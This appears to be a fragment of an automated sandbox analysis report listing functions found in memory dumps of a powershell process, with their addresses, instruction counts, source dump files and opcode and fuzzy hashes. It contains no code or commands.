                                              • Opcode Fuzzy Hash: 7e9f6914ae1823ada131504a29be79224e36223af4d6ab5882413f7698e1e798
                                              • Instruction Fuzzy Hash: AA326230B102249FE710DB58CD94BAAB7B2EFC4316F548189D949AF395CB75ED828F90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 088952EA Relevance: .5, Instructions: 510COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 560be9ed46b79a27dc5c6e873985e193170e58ac617355fe3be6aacf1e02fdee
                                              • Instruction ID: ba3ab6dfc2bd68582914e999445c4133c3424b6cea59261474c1c1a4860682ca
                                              • Opcode Fuzzy Hash: 560be9ed46b79a27dc5c6e873985e193170e58ac617355fe3be6aacf1e02fdee
                                              • Instruction Fuzzy Hash: 8C225774B01214DFDB15CF98C980AA9B7B2FF88316F19C159E849AB752C776EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08895984 Relevance: .5, Instructions: 465COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cec377c444155fef239fdc3d150eac895338fa54937aeaee807f6ec1942cd5dd
                                              • Instruction ID: adb35f83f6d2aa026296876694c33bb35d2d2474a9b9ae63a2e49f082729f03c
                                              • Opcode Fuzzy Hash: cec377c444155fef239fdc3d150eac895338fa54937aeaee807f6ec1942cd5dd
                                              • Instruction Fuzzy Hash: CA125874B01204DFDB25CF88C984A69B7B2FF84316F29C159E949AB752CB76EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0889CB03 Relevance: .4, Instructions: 442COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 826fb36f35077243775c06f4a23de09df8fb1cc8e61f34e3d9169338f5846383
                                              • Instruction ID: 371b55458d9c4a3ae5e4bbcc1e30ab58dd15785e57c385d4ead2933c6452c025
                                              • Opcode Fuzzy Hash: 826fb36f35077243775c06f4a23de09df8fb1cc8e61f34e3d9169338f5846383
                                              • Instruction Fuzzy Hash: 74129430B102249FE714DB58CD94B9AB7B2EFC4316F508189D949AF395CB75ED828F90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08894DC0 Relevance: .4, Instructions: 431COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d71dd995fff1baf09f203e0c94f756dd36d1f92d1c2383d4970666ddacf775ee
                                              • Instruction ID: 7cfe53ade84f1b6c8bee1faf6482314b5bd3dc31a5d7a801a83d8faf6a073bc3
                                              • Opcode Fuzzy Hash: d71dd995fff1baf09f203e0c94f756dd36d1f92d1c2383d4970666ddacf775ee
                                              • Instruction Fuzzy Hash: FE026E74B00314DFEB20DB58C990B6AB7B2FB94306F158199D948AB792CB76EC42CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08891B26 Relevance: .4, Instructions: 422COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c04992922bcecbcce2d7a4830f50bd2a55aa333773c39f8db6a7be2087bb98e2
                                              • Instruction ID: 58bb95c525d2ca43cd5c647dee9e7162dda6bfbfc6bb68f83ce77f1f529094ba
                                              • Opcode Fuzzy Hash: c04992922bcecbcce2d7a4830f50bd2a55aa333773c39f8db6a7be2087bb98e2
                                              • Instruction Fuzzy Hash: A5025C38B04206DFDB14CB58C984FA9B7F2EB84316F18C159E945AB795C77AEC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FA338 Relevance: .4, Instructions: 403COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: edaea436860bd0866c8a4199bbc662b98129902db6d34f97cf60bde421e079fa
                                              • Instruction ID: 9c0403e284b77d31b9cf068c3ed6ad26b5f9765ae85b18f477c09fe4056a7e0c
                                              • Opcode Fuzzy Hash: edaea436860bd0866c8a4199bbc662b98129902db6d34f97cf60bde421e079fa
                                              • Instruction Fuzzy Hash: FDE13430A043449FEB15DF74D80469EBBB6EFC5204F04856EE946DB292CB74ED46CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0889163E Relevance: .4, Instructions: 396COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bf9d76a911cb12388343b513609a588801152aabdda4fac4665414e8cb3f65a
                                              • Instruction ID: 371358a251b30ae013be2f357866b756ce460347b7f7d7c3c81ec37e0f3e6a21
                                              • Opcode Fuzzy Hash: 1bf9d76a911cb12388343b513609a588801152aabdda4fac4665414e8cb3f65a
                                              • Instruction Fuzzy Hash: 77F13938B04206DFDB14CF58C984EA9B7F2EB88316F19C159E849AB755C77AEC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FD9E0 Relevance: .3, Instructions: 328COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9e096d92fe3f14cf066323baef39286376262a121851c6d8860f5d5a2b463a3
                                              • Instruction ID: 9d27cca7a932c20cbcbad150f6b0917fbdcffb2bc8aa20ba397647cec1c0e85b
                                              • Opcode Fuzzy Hash: a9e096d92fe3f14cf066323baef39286376262a121851c6d8860f5d5a2b463a3
                                              • Instruction Fuzzy Hash: 21C1AD343017019FE7149F34D848B6ABBA6EFC5321F108A2DE5168B791DA79E846CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0889D72A Relevance: .3, Instructions: 327COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36971c44eb21f0505fec8cc5466f9461c42797e424f26954c0012c67f749f9a3
                                              • Instruction ID: 5382586865cd708551e683fda2a7a8916a38d85e0831a4334a7f2f005c5c5452
                                              • Opcode Fuzzy Hash: 36971c44eb21f0505fec8cc5466f9461c42797e424f26954c0012c67f749f9a3
                                              • Instruction Fuzzy Hash: ACE14D30B00228CFDB24DB64C984BAAB7B2BFC4306F548199D549AF796CB799D81CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EEE28 Relevance: .3, Instructions: 315COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56716f7fff3f3049f018a3bf88d07617cba17600a0f9911c2090c5a5fddde50c
                                              • Instruction ID: e28b6878439ba6f12ee55eb2afc92cb898865cba7a2592f7d44658be49eb3b58
                                              • Opcode Fuzzy Hash: 56716f7fff3f3049f018a3bf88d07617cba17600a0f9911c2090c5a5fddde50c
                                              • Instruction Fuzzy Hash: 7CC15F30A00258DFDB16EF64E844AADBBB6FF88316F104559F8069B794DB35ED42CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E4DF8 Relevance: .3, Instructions: 306COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f142d2dac7a73bbd2259c33dcf35285a25415eded1dbe5bfa55b4039d85fc9f2
                                              • Instruction ID: 4f4435acdade3b10d8da480a2002cce9aa9b266b83f090f1fc252029b193d7e5
                                              • Opcode Fuzzy Hash: f142d2dac7a73bbd2259c33dcf35285a25415eded1dbe5bfa55b4039d85fc9f2
                                              • Instruction Fuzzy Hash: 7DD15970A01205CFDB15DF94C684B99BBB2FF4830AF528569E406AF366C778ED89CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A0040 Relevance: .3, Instructions: 290COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6a37e55665e4f7da56b5d4ec83c08e0967a45605c76ba50255f41bfa5603302
                                              • Instruction ID: 3810408704971c7d921cfdc3f818ce80a26d4331cd4e09fe52459ed574256f86
                                              • Opcode Fuzzy Hash: c6a37e55665e4f7da56b5d4ec83c08e0967a45605c76ba50255f41bfa5603302
                                              • Instruction Fuzzy Hash: A9B15938A00604DFDB18DF69D8A4BAA7BF5FF89311F1584ADE906DB3A1D635E801CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A20D8 Relevance: .3, Instructions: 289COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e53252cd806cb0cf4254445bb6495cca08abbe0723cfc7511fdb66bd769b1ce
                                              • Instruction ID: 73ca2ca688a6f00b673ae93e245ae5e488cf9e95b460e47c5bc99a0fb0e21699
                                              • Opcode Fuzzy Hash: 6e53252cd806cb0cf4254445bb6495cca08abbe0723cfc7511fdb66bd769b1ce
                                              • Instruction Fuzzy Hash: B6C1F934A01259DFDB15CFA8D484A9EBBF2FF89310F248559E805AB351C771ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08893D30 Relevance: .3, Instructions: 289COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad518b8d7741bccb84927b749af878d3c2abdb3190720277d0748d59fbd8e878
                                              • Instruction ID: 83983a6c1738eb36155a8922e900c41e63a6273641dd102abef7026808ba8ce0
                                              • Opcode Fuzzy Hash: ad518b8d7741bccb84927b749af878d3c2abdb3190720277d0748d59fbd8e878
                                              • Instruction Fuzzy Hash: 44B17B30B00204DFDB14DB98C844BAEBBB2AF84306F19C159E955AF796CB75E842CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FF250 Relevance: .3, Instructions: 259COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e2f512132bf4321b0c146a7e6f1d9a6013288f26916d739c1c77a35e471beee
                                              • Instruction ID: 2ccf694209b2ed52d62ff2d7f7d3e2f2d54c80b09d4cfe89e272c9b54c0dc352
                                              • Opcode Fuzzy Hash: 8e2f512132bf4321b0c146a7e6f1d9a6013288f26916d739c1c77a35e471beee
                                              • Instruction Fuzzy Hash: F5A13935B002059FDB14DFB9D8546AEBBB6EF88311F14856AE906E7361DF349842CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EDBF0 Relevance: .3, Instructions: 251COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b1bfea6b5678a70065f67c85111258e6a6309aa49f189b1eb496f0d7fb6a937
                                              • Instruction ID: f87f31a5113487d69ad86974d469f0a8813754b2f98fc53c7f5db6b2a390f113
                                              • Opcode Fuzzy Hash: 6b1bfea6b5678a70065f67c85111258e6a6309aa49f189b1eb496f0d7fb6a937
                                              • Instruction Fuzzy Hash: 08919835B00614CFDB15EF68C488A59BBF6AF89725F1181ADE506DB3A1CB71EC42CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AF7E0 Relevance: .2, Instructions: 241COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03e513b8dd1183a4c6e81689a6e375f1f53220946715da391958377021135806
                                              • Instruction ID: 4a1b13374147579ace09b893185b2f8b718bb2ab877687bc0fd01f9b9622de36
                                              • Opcode Fuzzy Hash: 03e513b8dd1183a4c6e81689a6e375f1f53220946715da391958377021135806
                                              • Instruction Fuzzy Hash: B4B10370A00219DFDB14DFA8C984A9DBBF2FF88304F158569E805AB365DB71A945CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089ED6A8 Relevance: .2, Instructions: 236COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1f926f451d03ca14cccb3f40b597e0befcfeeb497ad361525cdf79cbf2d5265
                                              • Instruction ID: a5b0089b4e306d578b33daab03010c0c49745b88619852946be375758c63845f
                                              • Opcode Fuzzy Hash: a1f926f451d03ca14cccb3f40b597e0befcfeeb497ad361525cdf79cbf2d5265
                                              • Instruction Fuzzy Hash: A3816A74A053448FE702DB6CC8806AEBFB6EF85305F14856EE8459B351C735DD42C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F1A60 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96b74bfc2ecb7c250bac72bd9f4260ac4362c5f14f30e25f3c2593685eb18b72
                                              • Instruction ID: fcdcea5dd0fc99c66026b2b9c1a4a9e7994ebd56d5a6c249efddbbc5b349d469
                                              • Opcode Fuzzy Hash: 96b74bfc2ecb7c250bac72bd9f4260ac4362c5f14f30e25f3c2593685eb18b72
                                              • Instruction Fuzzy Hash: 11618D30B10211CBCB169B65A95867F7BFAABC4B92F14453DDA02D7382EB70CC428BD4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E3E91 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 995e4598496218eb074039bb3243496220e3d0f92224717c422f18163ae9c5aa
                                              • Instruction ID: b497773173418dabb2857d9aa2e5c92edc794ee9cc6b069cbf63c10672cab55e
                                              • Opcode Fuzzy Hash: 995e4598496218eb074039bb3243496220e3d0f92224717c422f18163ae9c5aa
                                              • Instruction Fuzzy Hash: AE8149357001049FDB05EBA8D958AADBBF6FFD8215F248069E506E73A0CB35EC42CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FAE70 Relevance: .2, Instructions: 209COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75c1be38966c5b54fc57c72c34ccc36dd5ecf9e03df5b417422526103da0c833
                                              • Instruction ID: 115e82d053243feaa7469977f36fd7954249f55f6f17f2552165723230a7bc91
                                              • Opcode Fuzzy Hash: 75c1be38966c5b54fc57c72c34ccc36dd5ecf9e03df5b417422526103da0c833
                                              • Instruction Fuzzy Hash: AD917F70A00209DFDB05DFA4D944B9EBBB2EF88311F148168E905AB396DB75AD45CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AF7D0 Relevance: .2, Instructions: 197COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55e303ea5784d6ac97bb4103625b418dc806b2f1191aeb9aa28826f289dc0e79
                                              • Instruction ID: cf4c4075f2070916eccba10f380e33184f5a6b99ffa1221886834c4d87f1bf2f
                                              • Opcode Fuzzy Hash: 55e303ea5784d6ac97bb4103625b418dc806b2f1191aeb9aa28826f289dc0e79
                                              • Instruction Fuzzy Hash: A7910670A00249CFDB04DFA9D994A9DBBF2FF88305F258169E409AB365DB71E945CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A19B0 Relevance: .2, Instructions: 196COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 415d9f94c7054986d81843a0422f24d59385b8b66f37c70b9614a356157190b4
                                              • Instruction ID: df2491baefccb0970256942ccc8cdc65e3ddd5e2ebcb590f9b8de3e525e5d50d
                                              • Opcode Fuzzy Hash: 415d9f94c7054986d81843a0422f24d59385b8b66f37c70b9614a356157190b4
                                              • Instruction Fuzzy Hash: 33718D74A00249DFDB14DF68D884AAEB7F5FF89310B14856AE906DB361D735EC42CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FCC8E Relevance: .2, Instructions: 189COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0084660817d709717391a660eb1c22ee62f1c7f27b8b4a96f36f92fd749f3043
                                              • Instruction ID: 22855fe7eaf67484a662364cafe773a077134da6554bf515afd20e014c7b7b05
                                              • Opcode Fuzzy Hash: 0084660817d709717391a660eb1c22ee62f1c7f27b8b4a96f36f92fd749f3043
                                              • Instruction Fuzzy Hash: 0C616E707002049FDB04DBB8D855AAEBBB2EFC4214F50862DD9059B392DBB5ED46CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB5B0 Relevance: .2, Instructions: 181COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85543edb95d1f4ed0f390165a1a0178aff3ce81b19e74c79e0b696c768aa31cc
                                              • Instruction ID: fc1b9b398e1ff101860add75f72ee764811b1ab1fe9b6a9fbdf7ea7b03a6e797
                                              • Opcode Fuzzy Hash: 85543edb95d1f4ed0f390165a1a0178aff3ce81b19e74c79e0b696c768aa31cc
                                              • Instruction Fuzzy Hash: CC717C34A10209CFDB11EFA4D484AEDBBB6FF84325F158159E901AB751DB71ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A51D8 Relevance: .2, Instructions: 175COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b32bb7d6c5fb517b6e3b4a7243531a7b84c0a5f186b05d7a828a6e5ffb7f9db9
                                              • Instruction ID: dd92ec89e0e529182d848cc3d67b5e5fc7028235d476e86292d3a41b09a4dae0
                                              • Opcode Fuzzy Hash: b32bb7d6c5fb517b6e3b4a7243531a7b84c0a5f186b05d7a828a6e5ffb7f9db9
                                              • Instruction Fuzzy Hash: B5515C38701244CFDB58DFA8C494AAEB7F1EFC9211B1484ADE9069B391DB75EC41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A4654 Relevance: .2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f85e3f2600b086cb1fc292edfbbb24e78dd4d178bd1c1764ad910fddd3305957
                                              • Instruction ID: 4cb41a3c8a0fcbcdec38a7f4541c7424eedbbcd3177366ef6938ffd8efbffa05
                                              • Opcode Fuzzy Hash: f85e3f2600b086cb1fc292edfbbb24e78dd4d178bd1c1764ad910fddd3305957
                                              • Instruction Fuzzy Hash: F2713874A00259CFDB11DF24C884B9DBBB2EF89301F2481A9E8099B365DB74DD85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EF9D0 Relevance: .2, Instructions: 165COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4934ef283ad8e5280d15d5a3bcad0ae7b981b563383ea99be43499f986a69f23
                                              • Instruction ID: 36d1de161ec058f03483acde8ae94966f9be7da70915ababdb043e82948e3f5f
                                              • Opcode Fuzzy Hash: 4934ef283ad8e5280d15d5a3bcad0ae7b981b563383ea99be43499f986a69f23
                                              • Instruction Fuzzy Hash: E551A135A012049FDB05EFA8E49499EBBF7EF88314B14846AE905DB391DF31ED02CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EF4A0 Relevance: .2, Instructions: 153COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca890df5fbb447aec018d610d5328e5ea1b5c1e7cf1e2cf65052ebc173728f6e
                                              • Instruction ID: ec0912f296273d67701608b62e0c9b2d084535aafb6b82e23e442a157f70f4c8
                                              • Opcode Fuzzy Hash: ca890df5fbb447aec018d610d5328e5ea1b5c1e7cf1e2cf65052ebc173728f6e
                                              • Instruction Fuzzy Hash: FA519D31A007149FDB14EF68C444AAEBBF6EF88314F14866AE4469B361DF74ED46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E52F0 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3426fb38370fc8714cf2d804bba57369c43f09fa88dda2d26aca43eedc268ee4
                                              • Instruction ID: 7b3a67fcef11aec5316b2c654f9d80b1ecc065293994644fd110e0666886cbbb
                                              • Opcode Fuzzy Hash: 3426fb38370fc8714cf2d804bba57369c43f09fa88dda2d26aca43eedc268ee4
                                              • Instruction Fuzzy Hash: E4512934A01208DFDB05DFA8D598A9DBBF6EF8831AF158069E805AB761DB74EC41CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F9BEC Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6db4602a779aed98f56a8fc3aac204f6bce71218d8f2896d057e0479c825f23
                                              • Instruction ID: 6a98b28dc8d6c7b986d0a25b8957060e2865d7e80ddbbc6b02f89792a06451c8
                                              • Opcode Fuzzy Hash: f6db4602a779aed98f56a8fc3aac204f6bce71218d8f2896d057e0479c825f23
                                              • Instruction Fuzzy Hash: 4A510A35A01209CFDB14DFA5D458BADBFB1EF84706F244469EA02A7292DF759C82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E93E8 Relevance: .1, Instructions: 134COMMON
                                              Download Yara Rule
                                              Memory Dump Source
